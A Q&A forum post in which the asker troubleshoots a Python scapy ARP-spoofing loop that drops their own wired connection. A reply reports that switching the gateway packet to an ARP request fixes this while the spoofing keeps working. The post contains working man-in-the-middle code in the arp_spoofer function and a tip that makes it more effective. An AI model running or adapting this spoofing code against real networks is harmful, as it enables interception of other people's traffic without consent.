# Sending packets with scapy ONLY on a wired connection, disconnects internet on my PC

Tags: python, networking, scapy

When i use send or sendp functions to send packets while using a WIRED connection to my router, the internet in my pc keeps on cutting of for every packet send, but when i use a wifi adapter, it works totally fine, iam searching about this problem from a very long time and can't find a clue, using sr function sends and receives packets without causing this problem, this problem is only exclusive for send/senp functions.

Here's the function that cases the problem:

```
def arp_spoofer(self):

        while self.master_run:
            target_arp_packet = ARP(op=2, psrc=self.gateway_ip, pdst=self.target_ip, hwdst=self.target_mac)
            gateway_arp_packet = ARP(op=2, psrc=self.target_ip, pdst=self.gateway_ip, hwdst=self.gateway_mac)
            send(target_arp_packet, verbose=False, iface=self.interface)
            send(gateway_arp_packet, verbose=False, iface=self.interface)
            sleep(2)
```

Comment: Have you tried with iface="interface name" ?

Comment: Iam already using it

Answer (score 0):

Ok i found the problem, and i can't find a reason for it, I changed the operation code of the ARP packet of the gateway to 1, for some reason, sending Gratuitous ARP packet to the gateway on a wired connection blocks your connection, but it works through WIFI, and even with this arp packet operation code is at 1 (ARP request), the spoofing still works perfectly for some reason, although the ARP table of the gateway should not be overwritten with an arp request, I will just spoof my mind and pretend it's just some magic.